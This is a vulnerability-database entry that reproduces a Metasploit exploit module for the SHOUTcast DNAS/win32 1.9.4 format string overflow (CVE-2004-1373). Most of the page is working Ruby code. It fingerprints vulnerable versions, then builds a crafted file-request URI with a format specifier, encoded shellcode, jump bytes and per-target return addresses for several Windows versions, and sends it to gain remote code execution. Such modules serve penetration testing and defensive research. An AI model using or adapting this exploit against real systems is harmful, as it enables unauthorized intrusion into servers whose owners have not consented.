SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType

SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow. Exploits a format string vulnerability in the Nullsoft SHOUTcast server for Windows, discovered by Tomasz Trojanowski and Damian Put


                                                ##
# $Id: shoutcast_format.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow&#39;,
			&#39;Description&#39;    =&#62; %q{
					This module exploits a format string vulnerability in the
				Nullsoft SHOUTcast server for Windows. The vulnerability is
				triggered by requesting a file path that contains format
				string specifiers. This vulnerability was discovered by
				Tomasz Trojanowski and Damian Put.
			},
			&#39;Author&#39;         =&#62; [ &#39;MC&#39;, &#39;mandragore[at]gmail.com&#39;],
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision: 9179 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;CVE&#39;, &#39;2004-1373&#39;],
					[ &#39;OSVDB&#39;, &#39;12585&#39;],
					[ &#39;BID&#39;, &#39;12096&#39;],
				],
			&#39;Privileged&#39;     =&#62; false,
			&#39;DefaultOptions&#39; =&#62;
				{
					&#39;EXITFUNC&#39; =&#62; &#39;process&#39;,
				},
			&#39;Payload&#39;        =&#62;
				{
					&#39;Space&#39;    =&#62; 250,
					&#39;BadChars&#39; =&#62; &#34;\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&#34;,
					&#39;StackAdjustment&#39; =&#62; -3500,
				},
			&#39;Platform&#39;       =&#62; &#39;win&#39;,
			&#39;Targets&#39;        =&#62;
				[
					[&#39;Windows NT SP5/SP6a English&#39;,    { &#39;Ret&#39; =&#62; 0x776a1799 }], # ws2help.dll
					[&#39;Windows 2000 English ALL&#39;,       { &#39;Ret&#39; =&#62; 0x75022ac4 }], # ws2help.dll
					[&#39;Windows XP Pro SP0/SP1 English&#39;, { &#39;Ret&#39; =&#62; 0x71aa32ad }], # ws2help.dll
					[&#39;Windows 2003 Server English&#39;,    { &#39;Ret&#39; =&#62; 0x7ffc0638 }], # PEB return
				],
			&#39;DisclosureDate&#39; =&#62; &#39;Dec 23 2004&#39;))

		register_options(
			[
				Opt::RPORT(8000)
			], self.class)
	end

	def check
		r = send_request_raw({
			&#39;uri&#39; =&#62; uri
		}, 5)

		return Exploit::CheckCode::Safe if not r

		m = r.body.match(/Network Audio Server\/([^\s]+)\s+([^&#60;]+)&#60;BR/)
		return Exploit::CheckCode::Safe if not m

		print_status(&#34;This system is running SHOUTcast #{m[1]} on #{m[2]}&#34;)

		# SHOUTcast Distributed Network Audio Server/win32 v1.9.2&#60;BR&#62;
		if (m[1] =~ /v1\.([0-8]\.|9\.[0-3])$/)
			if (m[2] == &#34;win32&#34;)
				return Exploit::CheckCode::Vulnerable
			end
			print_status(&#34;Vulnerable version detected, but not a win32 host&#34;)
		end

		return Exploit::CheckCode::Safe
	end

	def exploit

		num = 1046 - payload.encoded.length
		uri = &#39;/content/%#0&#39; + num.to_s + &#39;x&#39; + payload.encoded
		uri &#60;&#60; &#34;\xeb\x06&#34; + rand_text_alphanumeric(2)
		uri &#60;&#60; [target.ret].pack(&#39;V&#39;)
		uri &#60;&#60; &#34;\xe9\x2d\xff\xff\xff&#34;
		uri &#60;&#60; &#39;#0100x.mp3&#39;

		print_status(&#34;Trying to exploit target #{target.name} 0x%.8x&#34; % target.ret)
		send_request_raw({
			&#39;uri&#39; =&#62; uri
		}, 5)

		handler
		disconnect
	end

end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1